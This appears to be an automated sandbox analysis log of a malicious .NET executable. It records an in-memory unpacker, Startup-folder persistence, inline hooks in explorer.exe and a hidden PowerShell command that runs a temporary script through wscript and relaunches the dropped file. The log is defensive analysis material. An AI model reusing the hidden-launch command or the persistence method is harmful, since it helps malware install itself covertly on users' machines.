          Source: Binary string: wntdll.pdb source: f5cZJ0WC0H.exe, f5cZJ0WC0H.exe, 00000017.00000002.390826703.00000000011AF000.00000040.00000001.sdmp, help.exe, 00000018.00000002.505537240.0000000002CE0000.00000040.00000001.sdmp, ipconfig.exe, 0000001F.00000002.440706619.0000000002E3F000.00000040.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb source: f5cZJ0WC0H.exe
          Source: Binary string: help.pdbGCTL source: f5cZJ0WC0H.exe, 00000017.00000002.388366895.00000000007F0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: f5cZJ0WC0H.exe, 00000017.00000002.388366895.00000000007F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000016.00000000.387796376.0000000006FE0000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb' source: f5cZJ0WC0H.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: f5cZJ0WC0H.exe, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.f5cZJ0WC0H.exe.f40000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.f5cZJ0WC0H.exe.f40000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 18.0.f5cZJ0WC0H.exe.230000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 18.2.f5cZJ0WC0H.exe.230000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 19.0.f5cZJ0WC0H.exe.690000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 19.2.f5cZJ0WC0H.exe.690000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 21.2.f5cZJ0WC0H.exe.660000.1.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 21.0.f5cZJ0WC0H.exe.660000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 23.0.f5cZJ0WC0H.exe.620000.0.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 23.2.f5cZJ0WC0H.exe.620000.1.unpack, Testeconnect/Form2.cs | .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stamp
          Source: initial sample | Static PE information: 0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
          Suspicious powershell command line found
          Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0533ED4A push 850FD83Bh; ret | 5_2_0533ED51
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0533BE60 push es; ret | 5_2_0533BE76
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0533BEDA push es; ret | 5_2_0533BE76
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0533BEC2 push es; ret | 5_2_0533BED6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CA1B8 push ebx; retn 0004h | 18_2_008CA1CA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CE898 push 7804C33Fh; ret | 18_2_008CE89D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CBCBB pushad ; ret | 18_2_008CBCF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CBCFB pushad ; ret | 18_2_008CBCF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_008CBD1B pushad ; ret | 18_2_008CBCF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C4759D push edx; retn 0004h | 18_2_04C475A2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C40500 push eax; ret | 18_2_04C405FA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C4B702 push E80B905Eh; ret | 18_2_04C4B709
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C40CEF push esp; ret | 18_2_04C40CF2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C40CF8 push esp; ret | 18_2_04C40CFA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C478CF push 8BFFFFFFh; retf | 18_2_04C478D5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 18_2_04C40B99 push ebx; ret | 18_2_04C40B9A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_01019D20 push eax; retn 6A00h | 19_2_01019FAE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 19_2_0502B702 push E80B905Eh; ret | 19_2_0502B709
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D0D2 push eax; ret | 21_2_0041D0D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D0DB push eax; ret | 21_2_0041D142
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D085 push eax; ret | 21_2_0041D0D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041D13C push eax; ret | 21_2_0041D142
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00407AD0 pushad ; iretd | 21_2_00407ADC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_00405DE1 push ds; iretd | 21_2_00405DE7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0041659B push ecx; ret | 21_2_004165A2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Code function: 21_2_0116D0D1 push ecx; ret | 21_2_0116D0E4
          Source: initial sample | Static PE information: section name: .text entropy: 7.93997758183

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Boot Survival:

          Drops PE files to the startup folder
          Source: C:\Windows\SysWOW64\wscript.exe | PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Process information set: NOOPENFILEERRORBOX (34 identical entries)
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
